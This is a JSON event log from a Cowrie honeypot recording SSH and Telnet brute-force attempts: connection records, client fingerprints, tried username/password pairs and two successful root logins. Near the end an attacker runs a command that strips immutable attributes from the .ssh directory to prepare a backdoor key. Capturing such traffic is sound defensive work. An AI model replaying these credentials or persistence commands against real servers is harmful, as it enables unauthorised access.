{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":44579,"dst_ip":"1.2.3.4","dst_port":22,"session":"26d25fd02d92","protocol":"ssh","message":"New connection: 154.209.4.55:44579 (1.2.3.4:22) [session: 26d25fd02d92]","sensor":"my-vps","timestamp":"2025-09-09T04:16:22.700925Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:16:22.702121Z","src_ip":"154.209.4.55","session":"26d25fd02d92"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:16:22.905061Z","src_ip":"154.209.4.55","session":"26d25fd02d92"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:16:23.704977Z","src_ip":"154.209.4.55","session":"26d25fd02d92"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:16:23.903250Z","src_ip":"154.209.4.55","session":"c40b5ae5cccb"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:16:23.904402Z","src_ip":"154.209.4.55","session":"26d25fd02d92"}
{"eventid":"cowrie.session.closed","duration":13.74002981185913,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:16:24.299330Z","src_ip":"212.227.125.160","session":"6bb9309ca916"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48131,"dst_ip":"1.2.3.4","dst_port":23,"session":"267f4563dde1","protocol":"telnet","message":"New connection: 212.227.125.160:48131 (1.2.3.4:23) [session: 267f4563dde1]","sensor":"my-vps","timestamp":"2025-09-09T04:16:24.467684Z"}
{"eventid":"cowrie.session.closed","duration":13.717848539352417,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:16:25.130196Z","src_ip":"212.227.125.160","session":"164f3f2189e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48158,"dst_ip":"1.2.3.4","dst_port":23,"session":"52a13555bd45","protocol":"telnet","message":"New connection: 212.227.125.160:48158 (1.2.3.4:23) [session: 52a13555bd45]","sensor":"my-vps","timestamp":"2025-09-09T04:16:25.312322Z"}
{"eventid":"cowrie.session.connect","src_ip":"102.68.86.62","src_port":47218,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea7eb508f811","protocol":"ssh","message":"New connection: 102.68.86.62:47218 (1.2.3.4:22) [session: ea7eb508f811]","sensor":"my-vps","timestamp":"2025-09-09T04:16:38.074955Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:16:38.075793Z","src_ip":"102.68.86.62","session":"ea7eb508f811"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:16:38.245780Z","src_ip":"102.68.86.62","session":"ea7eb508f811"}
{"eventid":"cowrie.session.closed","duration":13.827234983444214,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:16:38.294850Z","src_ip":"212.227.125.160","session":"267f4563dde1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48379,"dst_ip":"1.2.3.4","dst_port":23,"session":"bbebc730d460","protocol":"telnet","message":"New connection: 212.227.125.160:48379 (1.2.3.4:23) [session: bbebc730d460]","sensor":"my-vps","timestamp":"2025-09-09T04:16:38.507365Z"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"123123","message":"login attempt [deploy/123123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:16:38.965847Z","src_ip":"102.68.86.62","session":"ea7eb508f811"}
{"eventid":"cowrie.session.closed","duration":13.841988801956177,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:16:39.153680Z","src_ip":"212.227.125.160","session":"52a13555bd45"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48382,"dst_ip":"1.2.3.4","dst_port":23,"session":"e1098c4fdb90","protocol":"telnet","message":"New connection: 212.227.125.160:48382 (1.2.3.4:23) [session: e1098c4fdb90]","sensor":"my-vps","timestamp":"2025-09-09T04:16:39.331226Z"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:16:40.138814Z","src_ip":"102.68.86.62","session":"ea7eb508f811"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":34958,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0fae6db3e1a","protocol":"ssh","message":"New connection: 152.32.190.168:34958 (1.2.3.4:22) [session: c0fae6db3e1a]","sensor":"my-vps","timestamp":"2025-09-09T04:16:47.114172Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:16:47.115167Z","src_ip":"152.32.190.168","session":"c0fae6db3e1a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:16:47.374049Z","src_ip":"152.32.190.168","session":"c0fae6db3e1a"}
{"eventid":"cowrie.login.failed","username":"hammer","password":"Welcome1","message":"login attempt [hammer/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-09T04:16:48.450212Z","src_ip":"152.32.190.168","session":"c0fae6db3e1a"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:16:49.712292Z","src_ip":"152.32.190.168","session":"c0fae6db3e1a"}
{"eventid":"cowrie.session.closed","duration":13.338165521621704,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:16:51.845469Z","src_ip":"212.227.125.160","session":"bbebc730d460"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48583,"dst_ip":"1.2.3.4","dst_port":23,"session":"a16e2b83bb63","protocol":"telnet","message":"New connection: 212.227.125.160:48583 (1.2.3.4:23) [session: a16e2b83bb63]","sensor":"my-vps","timestamp":"2025-09-09T04:16:52.044572Z"}
{"eventid":"cowrie.session.closed","duration":13.946980953216553,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:16:53.278138Z","src_ip":"212.227.125.160","session":"e1098c4fdb90"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48591,"dst_ip":"1.2.3.4","dst_port":23,"session":"38b021a531a8","protocol":"telnet","message":"New connection: 212.227.125.160:48591 (1.2.3.4:23) [session: 38b021a531a8]","sensor":"my-vps","timestamp":"2025-09-09T04:16:53.489357Z"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":35620,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f501f24c806","protocol":"ssh","message":"New connection: 192.210.135.20:35620 (1.2.3.4:22) [session: 3f501f24c806]","sensor":"my-vps","timestamp":"2025-09-09T04:17:00.415174Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:17:00.416040Z","src_ip":"192.210.135.20","session":"3f501f24c806"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:17:00.526290Z","src_ip":"192.210.135.20","session":"3f501f24c806"}
{"eventid":"cowrie.login.failed","username":"public","password":"123","message":"login attempt [public/123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:17:01.002582Z","src_ip":"192.210.135.20","session":"3f501f24c806"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:17:02.115817Z","src_ip":"192.210.135.20","session":"3f501f24c806"}
{"eventid":"cowrie.session.closed","duration":14.173338890075684,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:17:06.217838Z","src_ip":"212.227.125.160","session":"a16e2b83bb63"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48799,"dst_ip":"1.2.3.4","dst_port":23,"session":"45d3259fd6b8","protocol":"telnet","message":"New connection: 212.227.125.160:48799 (1.2.3.4:23) [session: 45d3259fd6b8]","sensor":"my-vps","timestamp":"2025-09-09T04:17:06.439443Z"}
{"eventid":"cowrie.session.closed","duration":13.686890840530396,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:17:07.176178Z","src_ip":"212.227.125.160","session":"38b021a531a8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48833,"dst_ip":"1.2.3.4","dst_port":23,"session":"cdbe0c1648b1","protocol":"telnet","message":"New connection: 212.227.125.160:48833 (1.2.3.4:23) [session: cdbe0c1648b1]","sensor":"my-vps","timestamp":"2025-09-09T04:17:07.401786Z"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":46424,"dst_ip":"1.2.3.4","dst_port":22,"session":"17b1b020feaa","protocol":"ssh","message":"New connection: 51.81.118.153:46424 (1.2.3.4:22) [session: 17b1b020feaa]","sensor":"my-vps","timestamp":"2025-09-09T04:17:14.949624Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:17:14.950500Z","src_ip":"51.81.118.153","session":"17b1b020feaa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:17:15.048058Z","src_ip":"51.81.118.153","session":"17b1b020feaa"}
{"eventid":"cowrie.login.failed","username":"black","password":"1234567890","message":"login attempt [black/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-09T04:17:15.478765Z","src_ip":"51.81.118.153","session":"17b1b020feaa"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":38947,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f28beb856fc","protocol":"ssh","message":"New connection: 211.22.25.164:38947 (1.2.3.4:22) [session: 6f28beb856fc]","sensor":"my-vps","timestamp":"2025-09-09T04:17:16.539922Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:17:16.540863Z","src_ip":"211.22.25.164","session":"6f28beb856fc"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:17:16.578788Z","src_ip":"51.81.118.153","session":"17b1b020feaa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:17:16.780333Z","src_ip":"211.22.25.164","session":"6f28beb856fc"}
{"eventid":"cowrie.login.failed","username":"blank","password":"blank","message":"login attempt [blank/blank] failed","sensor":"my-vps","timestamp":"2025-09-09T04:17:17.781660Z","src_ip":"211.22.25.164","session":"6f28beb856fc"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:17:19.023397Z","src_ip":"211.22.25.164","session":"6f28beb856fc"}
{"eventid":"cowrie.session.closed","duration":13.70381212234497,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:17:20.143178Z","src_ip":"212.227.125.160","session":"45d3259fd6b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49118,"dst_ip":"1.2.3.4","dst_port":23,"session":"6a30c728fa27","protocol":"telnet","message":"New connection: 212.227.125.160:49118 (1.2.3.4:23) [session: 6a30c728fa27]","sensor":"my-vps","timestamp":"2025-09-09T04:17:20.374558Z"}
{"eventid":"cowrie.session.closed","duration":13.744633913040161,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:17:21.145578Z","src_ip":"212.227.125.160","session":"cdbe0c1648b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49126,"dst_ip":"1.2.3.4","dst_port":23,"session":"234f2fe5d85c","protocol":"telnet","message":"New connection: 212.227.125.160:49126 (1.2.3.4:23) [session: 234f2fe5d85c]","sensor":"my-vps","timestamp":"2025-09-09T04:17:21.347931Z"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":56389,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d3bd4aaf0f3","protocol":"ssh","message":"New connection: 154.209.4.55:56389 (1.2.3.4:22) [session: 2d3bd4aaf0f3]","sensor":"my-vps","timestamp":"2025-09-09T04:17:24.759887Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:17:24.763221Z","src_ip":"154.209.4.55","session":"2d3bd4aaf0f3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:17:24.971154Z","src_ip":"154.209.4.55","session":"2d3bd4aaf0f3"}
{"eventid":"cowrie.login.success","username":"root","password":"Root12345","message":"login attempt [root/Root12345] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:17:25.779354Z","src_ip":"154.209.4.55","session":"2d3bd4aaf0f3"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":58390,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c63fb5a501a","protocol":"ssh","message":"New connection: 103.59.95.12:58390 (1.2.3.4:22) [session: 5c63fb5a501a]","sensor":"my-vps","timestamp":"2025-09-09T04:17:26.041205Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:17:26.043989Z","src_ip":"103.59.95.12","session":"5c63fb5a501a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:17:26.262244Z","src_ip":"154.209.4.55","session":"2d3bd4aaf0f3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:17:26.263070Z","src_ip":"154.209.4.55","session":"2d3bd4aaf0f3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:17:26.264412Z","src_ip":"154.209.4.55","session":"2d3bd4aaf0f3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:17:26.296353Z","src_ip":"103.59.95.12","session":"5c63fb5a501a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:17:26.477411Z","src_ip":"154.209.4.55","session":"2d3bd4aaf0f3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:17:26.900389Z","src_ip":"154.209.4.55","session":"2d3bd4aaf0f3"}
